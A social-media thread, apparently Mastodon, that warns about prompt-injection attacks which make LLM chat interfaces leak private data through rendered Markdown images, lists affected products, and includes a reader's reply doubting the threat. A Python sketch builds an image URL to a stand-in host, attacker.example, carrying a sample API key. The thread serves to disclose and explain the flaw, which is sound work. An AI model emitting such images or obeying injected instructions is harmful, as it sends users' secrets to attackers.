Your regular reminder to never build an LLM-based chat interface with access to privileged information that can render Markdown images targeting external domains, if you don't want a prompt injection attack to be able to instantly exfiltrate that private data
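For anyone unclear on the mechanism, here's a minimal sketch of the exfiltration vector (the attacker.example domain and the sample data are hypothetical, not from any of the linked write-ups): an injected instruction gets the model to output a Markdown image whose URL carries the private data, and the moment the chat UI renders that image, the browser makes the request.

```python
# Minimal sketch of Markdown-image exfiltration. The domain, function
# name, and data below are hypothetical; this only illustrates why
# auto-rendered Markdown images leak data.
from urllib.parse import quote

def malicious_markdown(private_data: str) -> str:
    """What an injected prompt asks the model to emit: a Markdown image
    whose URL carries the private data as a query parameter."""
    return f"![loading](https://attacker.example/pixel?d={quote(private_data)})"

# If the chat UI renders this Markdown, the browser issues a GET request
# to attacker.example, delivering the data with zero user clicks.
print(malicious_markdown("api_key=sk-secret-123"))
# ![loading](https://attacker.example/pixel?d=api_key%3Dsk-secret-123)
```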
Today's example is Google AI Studio: https://simonwillison.net/2024/Aug/7/google-ai-studio-data-exfiltration-demo/
It joins ChatGPT, Google Bard, writer.com, Amazon Q, Google NotebookLM and GitHub Copilot Chat in my collection of products that have made this mistake: https://simonwillison.net/tags/markdown-exfiltration/
@simon I guess I don't understand how this is an attack. The malicious prompt came from the attacker, but so did everything else. So the attacker already has access to the "exfiltrated" data, right?
Or is there some missing context here?